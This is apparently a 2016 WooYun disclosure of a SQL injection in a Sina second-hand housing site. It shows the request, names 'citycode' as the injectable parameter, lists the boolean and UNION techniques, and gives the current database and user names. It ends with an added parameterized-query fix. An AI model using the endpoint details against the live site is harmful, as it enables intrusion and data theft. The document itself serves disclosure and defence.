
MySQL injection in a Sina site (supports three query techniques / data for all city sites / administrator data)

2016-06-12 05:15

Code area
GET /di/positioncommunity/?citycode=cd&x=104.03249595349092&y=30.607376004698764&callback=jsonp4&_=1461490791828 HTTP/1.1
Host: cd.esf.sina.com.cn
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 KoudailejuApp
Accept-Language: zh-cn
Referer: http://m.leju.com/touch/esf/cd?ln=ljmf_h5&source=ios&s=yd_kdlj
Accept-Encoding: gzip, deflate





The Sina second-hand housing site



Code area
Injectable parameter: citycode





Proof of vulnerability:

Boolean-based injection

UNION query injection





64 databases nationwide








Code area
Current database: 'shop_admin'

Current database user: '[email protected] %'

Remediation:

Filter the input
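
One way to apply the filtering recommended above to the `citycode`, `x` and `y` parameters of the reported request, combined with bound query parameters. This is an added example, not code from the original report or from the affected site. Assumptions: Python with `sqlite3` standing in for the MySQL backend, a hypothetical `community` table, and a hypothetical list of valid city codes.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Assumption: valid city codes are known; only "cd" is from the report.
KNOWN_CITY_CODES = frozenset({"cd", "sh"})


class BadRequest(ValueError): ...  # missing, repeated or invalid parameter


def parse_position_request(url):
    """Return validated (citycode, x, y) from the request's query string."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name in ("citycode", "x", "y"):
        if len(qs.get(name, [])) != 1:
            raise BadRequest(name)
    citycode = qs["citycode"][0]
    if citycode not in KNOWN_CITY_CODES:  # allowlist, not a character blacklist
        raise BadRequest("citycode")
    try:
        x, y = float(qs["x"][0]), float(qs["y"][0])
    except ValueError:
        raise BadRequest("coordinates") from None
    if not (-180 <= x <= 180 and -90 <= y <= 90):  # also rejects NaN and inf
        raise BadRequest("coordinates")
    return citycode, x, y


def nearby_communities(conn, url, limit=5):
    """Look up communities using bound parameters only (hypothetical schema)."""
    citycode, x, y = parse_position_request(url)
    rows = conn.execute(
        "SELECT name FROM community WHERE citycode = ? "
        "ORDER BY (lng - ?) * (lng - ?) + (lat - ?) * (lat - ?) LIMIT ?",
        (citycode, x, x, y, y, limit),
    )
    return [row[0] for row in rows]


def demo_db():
    """Constructed in-memory data; sqlite3 stands in for the MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE community (citycode TEXT, name TEXT, lng REAL, lat REAL)")
    conn.executemany("INSERT INTO community VALUES (?, ?, ?, ?)", [
        ("cd", "Constructed Community A", 104.03, 30.60),
        ("cd", "Constructed Community B", 104.10, 30.70),
        ("sh", "Constructed Community C", 121.47, 31.23),
    ])
    return conn
```

The allowlist matters most where a value cannot be bound as a query parameter, such as a database or table name chosen per city.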

Source: www.wooyun.org/bugs/wooyun-2016-0200165
